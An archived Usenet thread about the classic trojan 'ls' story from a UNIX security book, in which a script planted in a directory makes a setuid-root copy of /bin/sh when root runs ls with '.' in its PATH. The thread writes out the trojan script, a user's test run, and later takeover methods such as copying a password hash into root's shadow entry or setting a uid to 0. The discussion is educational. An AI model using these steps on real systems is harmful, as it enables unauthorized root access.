Professional Web Applications Themes

How is the root password stolen? - Linux / Unix Administration

The book `Practical UNIX & Internet Security, 3rd' mentioned a story about an administrator who lost his root password. I wonder why the administrator in the story lost the root password. Following is that story. One person wanted to be the root to do something. He found that the root search path included the current directory . and wrote an executable script named `ls' under current directory, the content was: #!/bin/sh cp /bin/sh ./stuff/junk/.superdude chmod 4555 ./stuff/junk/.superdude rm -f $0 exec /bin/ls ${1+"$"} He then ran following commands at command line: %cd %chmod 700 . %touch ./-f After that he ...

  1. #1

    Default How is the root password stolen?

    The book `Practical UNIX & Internet Security, 3rd' mentioned a story
    about an administrator who lost his root password. I wonder why the
    administrator in the story lost the root password. Following is that
    story.

    One person wanted to be the root to do something. He found that the
    root search path included the current directory . and wrote an
    executable script named `ls' under current directory, the content was:

    #!/bin/sh
    cp /bin/sh ./stuff/junk/.superdude
    chmod 4555 ./stuff/junk/.superdude
    rm -f $0
    exec /bin/ls ${1+"$"}

    He then ran following commands at command line:

    %cd
    %chmod 700 .
    %touch ./-f

    After that he said he could not delete one file with a strange name
    under his directory to that administrator. The administrator came to
    him and ran the ls command but found nothing (Question 1). The
    administrator switched to root by `su' and then went to that person's
    directory and ran ls again. At this step, the administrator exposed the
    root password (Question 2) but he was not aware of it at that time. He
    continued to delete one file with strange name for that person.

    The result was that administrator can not login with root after that
    person changed the root password.

    --- --- ---

    My questions are:

    Question 1: Why the administrator can not list the content of the
    directory at the first time, but can do it after su to root later.

    Question 2: If the administrator did an exit after ran the second ls,
    will he lose the root password again?

    Sincerely,

    lovecreatesbeauty

    lovecreatesbeauty Guest

  2. #2

    Default Re: How is the root password stolen?

    On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <com> wrote:

    (snip social engineering example)
     
     

    Because . was in his path, and he wasn't running the real ls, he was
    running the one in the directory he was in. NEVER have . in root's
    path, especially first.
     

    A good admin will take several precautions to avoid this sort of thing.
    And of course, anyone pulling such a stunt is going to lose access at
    least, so it's a self-regulating problem in several ways.

    Dave Guest

  3. #3

    Default Re: How is the root password stolen?

    In our last episode, the evil Dr. Lacto had captured our hero,
    "lovecreatesbeauty" <com>, who said: 

    You are slightly misunderstanding what happened.
     

    The root password was not exposed. The fake "ls" script created a shell
    that would run with root privileges. That gave the person root access
    without needing the password.

    hymie! http://www.smart.net/~hymowitz homelinux.net
    ================================================== =============================
    Now that you've found another key, what are you going to play?
    --John Lennon/Paul McCartney
    ================================================== =============================
    hymie! Guest

  4. #4

    Default Re: How is the root password stolen?

    On 10 Mar 2006, in the Usenet newsgroup comp.unix.admin, in article
    <googlegroups.com>, lovecreatesbeauty wrote:
     

    Because he had '.' (the current directory) in the front of his PATH.
     

    Yes
     

    %chmod 700 .

    man sh (or what ever your shell is)
    man chmod (or try it yourself and see what happens)
     

    Re-read the story. "A few minutes later, he couldn't get the new root
    password." The game was won when the administrator ran this ls command.
    Try this:

    1. Create a file named 'ls' in your home directory, that contains

    echo "Hello World"

    2. Make this file executable with 'chmod 700 ls'

    3. Change your PATH with the command

    PATH=".:$PATH"

    4. List the files in your directory - using the command 'ls'

    5. Log out then log back in, and repeat 4.

    Think what you just did, and think why it happened.

    Old guy
    Moe Guest

  5. #5

    Default Re: How is the root password stolen?


    hymie! wrote: 

    I know the the root's password was not exposed, but that person changed
    it later.

    After su to root and ran that dummy `ls', if that administrator exitd
    completely, can the root's password be changed by that person?

    If that administrator did not exit after su to root, then he will lose
    the root's password without executing a special suid/sgid executable
    script, am i right?

    lovecreatesbeauty Guest

  6. #6

    Default Re: How is the root password stolen?


    hymie! wrote: 


    I know the root's password was not exposed, but that person changed it
    later.

    After su to root and ran that dummy `ls', if that administrator exitd
    completely, can the root's password be changed by that person?

    If that administrator did not exit after su to root, then he will lose
    the root's password without executing a special suid/sgid executable
    script, am i right?

    What real use does that dummy `ls' have?

    lovecreatesbeauty Guest

  7. #7

    Default Re: How is the root password stolen?

    On 10 Mar 2006 20:01:01 -0800, lovecreatesbeauty wrote:
     
    >
    >
    > I know the root's password was not exposed, but that person changed it
    > later.
    >
    > After su to root and ran that dummy `ls', if that administrator exitd
    > completely, can the root's password be changed by that person?
    >
    > If that administrator did not exit after su to root, then he will lose
    > the root's password without executing a special suid/sgid executable
    > script, am i right?
    >
    > What real use does that dummy `ls' have?[/ref]

    The dummy verion of ls creates a copy of the /bin/sh executable called
    ../stuff/junk/.superdude
    When cp makes a copy of the file, the file which is created is owned by the
    user who executes the copy. In this case root.

    The script then changes the permissions on that executable to 4555.


    This has the efect of making the script readable and executable by anyone,
    and also sets the SUID bit which has the effect of running the executable
    as though it were run by the user who owns it.

    So an ls -l of ./stuff/junk/.superdude would show something like...

    sr-xr-xr-x 1 root users 451072 Mar 10 21:23 ./stuff/junk/.superdude

    Then it removes itself (rm -f $0) and executes the real ls.

    It only needs to get executed once by a user with root priviledge and the
    game is over.
    After the script has been executed by a superuser there is an executable
    version of /bin/sh on the system which when executed by anyone will run
    with an euid of 0.

    The effect of that is that somone who runs ./stuff/junk/.superdude can then
    act as root.

    Does that explain it for you?
    Adam
    Adam Guest

  8. #8

    Default Re: How is the root password stolen?

    On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:
     
    > [/ref]

    Um I don't think you are answering the right question here...
    The reason he couldn't list the content as a non root user was because the
    'evil' user had set his directory permissions to 700.
    This was intended to force the other guy into becoming root in order to
    solve the problem.
    Adam
    Adam Guest

  9. #9

    Default Re: How is the root password stolen?


    Adam Price wrote: 

    Great thanks for your help and detail explaining on the knowledge of
    the script file.

    I still have the question: Did the administrator run exit after he did
    the task for that person?

    1. If the administrator exited once (or twice, or set the terminal to
    show `login:' prompt), can the next person act as root and change the
    root's password?

    2. If the administrator did not exit after su to root at all, then
    anyone else can get the root privilege without that SUID script, am I
    right?

    lovecreatesbeauty Guest

  10. #10

    Default Re: How is the root password stolen?

    On 11 Mar 2006 04:22:10 -0800, lovecreatesbeauty wrote:
     
    >
    > Great thanks for your help and detail explaining on the knowledge of
    > the script file.
    >
    > I still have the question: Did the administrator run exit after he did
    > the task for that person?
    >[/ref]
    It doesn't matter. Once the script has run the shell file exists. We don't
    know if he exited or not and we don't need to know.
     
    Yes anyone who knows about the ...stuff/junk/.superdude can run it and get
    root access.
     

    If any user walks away without logging off then anyone who walks up to his
    computer can use it as though they are that user.
    If that user is logged in as root then anyone user can be root.

    Without wishing to be rude, these are pretty fundimental things about
    operating a computer and don't really have anything to do with being root
    as such. You really do need to sit down and work through some of these
    examples in your textbook and work out what is going on and why. It will
    help you understand what is going on far more than the sort of help you
    will get here.

    As somone else said, read the man pages for cp, for chmod, for ls and rm,
    then read about the exec system call and find out about suid.

    Adam
    Adam Guest

  11. #11

    Default Re: How is the root password stolen?

    On Sat, 11 Mar 2006 07:28:20 +0000, Adam Price <adam+co.uk> wrote: [/ref]
     

    I realize that I didn't answer the question he's asking, because I've
    never seen him before and I don't know his motivation. But I gave
    enough information to give the idea that . in the path is a problem and
    playing games like this is a bad idea. Others have filled in the
    details.
     

    Yup.
    Dave Guest

  12. #12

    Default Re: How is the root password stolen?


    Adam Price wrote: 

    Thank you. I think I get it, but can not act as root by runnig the
    dummy version of ls in my demo:

    $ passwd root
    passwd: You may not view or modify password information for root.
    $ ls -al
    total 624
    drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
    drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
    -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
    $ ./.superdude
    ..superdude-2.05b$ passwd root
    passwd: You may not view or modify password information for root.
    ..superdude-2.05b$

    lovecreatesbeauty Guest

  13. #13

    Default Re: How is the root password stolen?

    On 11 Mar 2006 23:00:31 -0800, lovecreatesbeauty wrote:
     
    >
    > Thank you. I think I get it, but can not act as root by runnig the
    > dummy version of ls in my demo:
    >
    > $ passwd root
    > passwd: You may not view or modify password information for root.
    > $ ls -al
    > total 624
    > drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
    > drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
    > -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
    > $ ./.superdude
    > .superdude-2.05b$ passwd root
    > passwd: You may not view or modify password information for root.
    > .superdude-2.05b$[/ref]

    That is probably just your passwd program being clever and realising the
    difference between euid and uid (efective user id and real user id).
    Try editing the password file with vipw.
    Try just editing it with vi.
    You should be able to make changes to the password file now, it's just that
    many of the programs that are designed for editing the password file are
    also likely know about this kind of hack.
    It may be that your filesystem ignores the setuid bit on the filesystem
    with the home-directories (this is another common security measure).
    Have a bit of a play about, see what things you can change, see how you can
    use them to get higher privs.

    When have run ".superdude" try using the 'id' command and see what
    userdetails you have.
    Try using "su -" after you have run ".superdude"..
    Adam
    Adam Guest

  14. #14

    Default Re: How is the root password stolen?


    Adam Price wrote: 

    I am happy that you confirmed my understanding ( Do I really understand
    it correctly :-) ) on how the root privilege leaked and the root's
    password was changed in the previous messages. But I do not know how to
    change the /etc/passwd file according to your suggestion to demonstrate
    that trick. I am a C programmer with not much experiences and knowledge
    on UNIX or even C programming language. I hope to become an excellent
    C/Unix programmer/administrator like extreme experts on these groups
    like you.

    The /usr/bin/passwd is a separate program but not a built-in one in
    /bin/sh. Though I set SUID for /bin/sh, is /usr/bin/passwd aware of
    this change? I ask this question because I read the Debian Linux's
    online help and it says for example `cd' is a built-in command but
    passwd is not such one (I upgrade bash to and make version 3.1 my login
    shell in passwd file, but the /bin/sh is a link to bash 2.05.):

    $ help
    GNU bash, version 3.1.0(1)-release (i686-pc-linux-gnu)
    These shell commands are defined internally. Type `help' to see this
    list.
    <snip>
    cd [-L|-P] [dir]

    lovecreatesbeauty Guest

  15. #15

    Default Re: How is the root password stolen?

    lovecreatesbeauty wrote: 

    You're not describing the root password being stolen. That
    wording suggests that the bad guy actually learned what the
    root password was. That is not what happened. What happened
    is root access without a password was given away.

    You're describing root access being stolen, and thus the host
    being stolen. That's different from the root password being
    stolen. To steal the root password I need to find out what it
    is. To steal root access I don't need to know what the root
    password is. And once I have root access without a password
    I can set the password to whatever I want.
     

    The dummy ls was a script that creates a setuid shell and then
    runs regular ls. This is a classic example in pretty much any
    book on dealing with the root account. If this actually happened
    then you need to fire the person with the dummy script. Have
    Security walk them out immediately. And reload the entire host
    from backup tapes that were made before the incident. Then
    hire a professional to audit the system to see what prior damage
    had been done.

    The problem - A setuid shell runs as root for most purposes. As
    such it can do nearly anything directly and can do anything
    indirectly. So long as that setuid copy of the shell remains in
    existance, anyone who can get to that copy has unlimited power
    on that host.

    In another post you noticed that running a setuid shell isn't
    quite the same thing as really being root. There are specific
    technical differences between having an effective UID of 0 from
    running a setuid-root executible and having an actual UID of
    0 from logging in as root. But that doesn't matter. Simple
    programs like "cp", "chmod" and "mv" are all you need anyways.

    So you can't change the root password with a setuid shell.
    You can use "vi" to set passwords. That's how the bad guy
    would do it anyways.

    Doug Guest

  16. #16

    Default Re: How is the root password stolen?


    Doug Freyburger wrote: 

    Thank you. Adam suggested this vipw command and I see some other people
    mentioned vipw is more secure also. I tried to change one newly added
    user's passwd by vipw in my demo, but failed at login. I tried
    following the two commands and deleted the password field between two
    colons. The colons remained certainly. I think it meant that the user's
    passwd was cleared or set to be blank. But I can not login this user
    with a blank password.

    $ su root -c 'vipw'
    $ su root -c 'vipw -s'

    user::1001:100::/home/user:

    I know the password field in /etc/passwd is a placeholder and not a
    real password to the corresponding user. But when I use 'vipw -s', I
    see a strange string in the password field, is it the encrypted
    password? If I change that password field, it will be decrypted to the
    real password when login, we still can not know this real password. How
    can I change password in this way? It's confused.

    lovecreatesbeauty Guest

  17. #17

    Default Re: How is the root password stolen?

    On 13 Mar 2006 19:41:58 -0800, lovecreatesbeauty wrote:
     
    >
    > Thank you. Adam suggested this vipw command and I see some other people
    > mentioned vipw is more secure also. I tried to change one newly added
    > user's passwd by vipw in my demo, but failed at login. I tried
    > following the two commands and deleted the password field between two
    > colons. The colons remained certainly. I think it meant that the user's
    > passwd was cleared or set to be blank. But I can not login this user
    > with a blank password.
    >
    > $ su root -c 'vipw'
    > $ su root -c 'vipw -s'
    >
    > user::1001:100::/home/user:
    >
    > I know the password field in /etc/passwd is a placeholder and not a
    > real password to the corresponding user. But when I use 'vipw -s', I
    > see a strange string in the password field, is it the encrypted
    > password? If I change that password field, it will be decrypted to the
    > real password when login, we still can not know this real password. How
    > can I change password in this way? It's confused.[/ref]

    Your system is obviously more secure than a basic unix system. Edit the
    shadow password file, find your username, Copy the encrypted password,
    Place it in the root entry. (Read the man page for passwd to find out which
    fields are which). Now log in as root using YOUR password not the root
    password.
    Keep a copy of the shadow password file before you do this.

    Or when you edit the password file, change your user id to 0. Then when you
    log in as you change the root password with the passwd command.
    Or Or Or...
    Loads of ways to do this, but the point of the lesson in the book was to
    remind you that if you leave . in roots PATH variable that you will run the
    risk of losing control of the box, not to teach you how to hack your home
    linux system.
    This really isn' the place for hacking lessons (and I don't know where such
    a place might be).
    If you understand why this is a bad idea now then you can move on to the
    next chapter in the book.
    Adam

    Adam Guest

  18. #18

    Default Re: How is the root password stolen?


    Adam Price wrote: 

    Hello Adam. Thank you. I changed one non-root user's password by vipw
    successfully under your help. I did this on Debian Linux 3.1, and it is
    more secure as you mentioned. I will never have . in my PATH variable
    at the first position, I will keep it in mind. I'll continue to go
    through the rest of that book and read many other books. I have learnt
    a lot from you. Thank you for the kindly help.

    lovecreatesbeauty Guest

  19. #19

    Default Re: How is the root password stolen?

    lovecreatesbeauty wrote: 
    >
    > Thank you. Adam suggested this vipw command and I see some other people
    > mentioned vipw is more secure also.[/ref]

    vipw is more secure, does error checking, tries to lock out other
    vipw users and so on. Among other things it's one of the programs
    that tries to tell the difference between running setuid and being
    logged in as root. It's one of the reasons the bad guys would
    use vi instead.
     

    Shadow file already discussed in another post.

    Doug Guest

Similar Threads

  1. Help - root Password
    By Jeff in forum Ubuntu
    Replies: 7
    Last Post: December 1st, 06:09 PM
  2. root password
    By Vittorix in forum Ubuntu
    Replies: 6
    Last Post: November 4th, 05:49 PM
  3. Can't change root password
    By Wes in forum Ubuntu
    Replies: 9
    Last Post: August 31st, 09:08 AM
  4. No Root password
    By EJStark in forum AIX
    Replies: 9
    Last Post: October 25th, 01:15 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139